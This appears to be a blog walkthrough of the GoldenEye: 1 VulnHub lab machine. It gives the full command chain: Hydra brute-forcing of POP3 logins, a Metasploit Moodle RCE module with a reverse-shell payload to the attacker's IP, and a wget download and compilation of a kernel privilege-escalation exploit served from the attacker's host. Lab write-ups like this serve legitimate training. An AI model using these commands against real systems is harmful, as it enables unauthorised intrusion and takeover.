GoldenEye: 1 VulnHub Walkthrough

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Hello Everyone, In this blog i am going to post walkthrough of GoldenEye 1. This machine is for them who have basic Knowledge and hand’s on experience with penetration Testing.

you can download the machine here.

Let’s Begin !!

Target IP – 192.168.43.155

Attacker IP – 102.168.43.139

So, Let’s start with scanning

nmap -sC -sV -Pn -p- 192.168.43.155

Ok!! we can see there are 4 ports open.

25- smtp

80- http

55006- ssl/pop3

55007- pop3

Now, Let’s check the website running on port 80.

It says to Navigate to /sev-home/.

Ok, We need to Login.

So, i tried few default usernames and passwords but it didn’t work.

I thought of checking page source.

Ok, There is terminal.js Let’s open it.

We can there is HTML encoded password and two usernames.

boris

natalya

Let’s decode the password.

InvincibleHack3r

We got the password .

Let’s try to login on /sev-home/

Username – boris

Password – InvincibleHack3r

we logged in!!

I read the information written on the page.

the last sentence says POP3 is running on non-default port.

Even scan result says there is POP3 running on port 55007.

Let’s Bruteforce on POP3 with the usernames boris and natalya using the tool Hydra.

hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

hydra -l natalya -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

We found passwords.

boris – secret1!

natalya – bird

Now, Let’s connect to pop3 using the credentials by nc.

nc 192.168.43.155 55007

USER boris

PASS secret1!

LIST

There are 3 Messages Let’s see,

RETR 1

It’s a message from admin to boris.

RETR 2

It’s a message from natalya to boris, that natalya can break boris codes.

RETR 3

In 3rd message we can see access codes are kept in root directory. So, we can’t access from here.

Let’s move to natalya

nc 192.168.43.155 55007

USER natalya

PASS bird

LIST

There are 2 mesages, Let’s see

RETR 1

It’s a message to natalya, that she has to stop breaking boris codes.

RETR 2

Ok! we got some information here,

username: xenia

password: RCP90rulez!

Domain: severnaya-station.com/gnocertdir

Before opening the domain we have to point server IP to severnaya-station.com in /etc/hosts

echo 192.168.43.155 severnaya-station.com >> /etc/hosts

To check,

cat /etc/hosts

Let’s check in the browser

Now, Let’s login with the credentials we got in natalya mail.

username: xenia

password: RCP90rulez!

After logging in, I was exploring and found another user chat in messages.

if we read it it says,

My email username is “doak”.

Let’s bruteforce again with doak as the username on pop3 using hydra.

hydra -l doak -P /usr/share/wordlists/fasttrack.txt -f 192.168.43.155 -s 55007 pop3

Ok! we got the password “goat“.

Now, let’s connect to pop3 using nc.

nc 192.168.43.155 5500

USER doak

PASS goat

LIST

RETR 1

So, we got the login credentials of doak.

username: dr_doak

password: 4England!

Let’s login,

We logged in as dr_doak.

I was checking every module to find any clue then there is module My private files there i found a text file “s3cret.txt

I downloaded the file and checked if we can find anything,

So, it says something is located in /dir007key/for-007.jpg

severnaya-station.com/dir007key/for-007.jpg

So, i opened above URL in browser

It’s an image. So i downloaded it and checked,

wget http://severnaya-station.com/dir007key/for-007.jpg

strings for–007.jpg

Ok! we can see something encoded string, It’s a base64 encoded string

eFdpbnRlcjE5OTV4IQ==

Let’ decode,

We got plain text string and we know it is admin’s password.

username: admin

password: xWinter1995x!

Let’s login,

We logged in as ADMIN.

Now, we should get shell on our terminal.

I searched if we can upload a file to get the revere shell but didn’t find any.

After exploring, i found the the website name as “MOODLE” and found it’s version.

I checked if there is any exploit for Moodle 2.2.3 and i found there is Remote Code Execution vulnerability .

So, i started Metasploit Framework.

msfconsole

use exploit/multi/http/moodle_cmd_exce

show options

set password xWinter1995x!

set rhost severnaya-station.com

set targeturi /gnocertdir

set username admin

set payload cmd/unix/reverse

set lhost 192.168.43.139

set lport 4444

exploit

we got the shell.

Now we have to get root access,

uname -a

So, i got the version details.

I checked for the exploit and found 1.

Let’s download it,

and let’s edit the code

By default it is gcc change it to cc as gcc isn’t working on shell we got.

Save it and start python http server.

python -m SimpleHTTPServer 8080

Now, let’s get the file into the shell we got,

wget http://192.168.43.139:8080/exploit.c

cc exploit.c -o priv

./priv

id

Here, I got the ROOT access.

Writer: Anudeep is Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top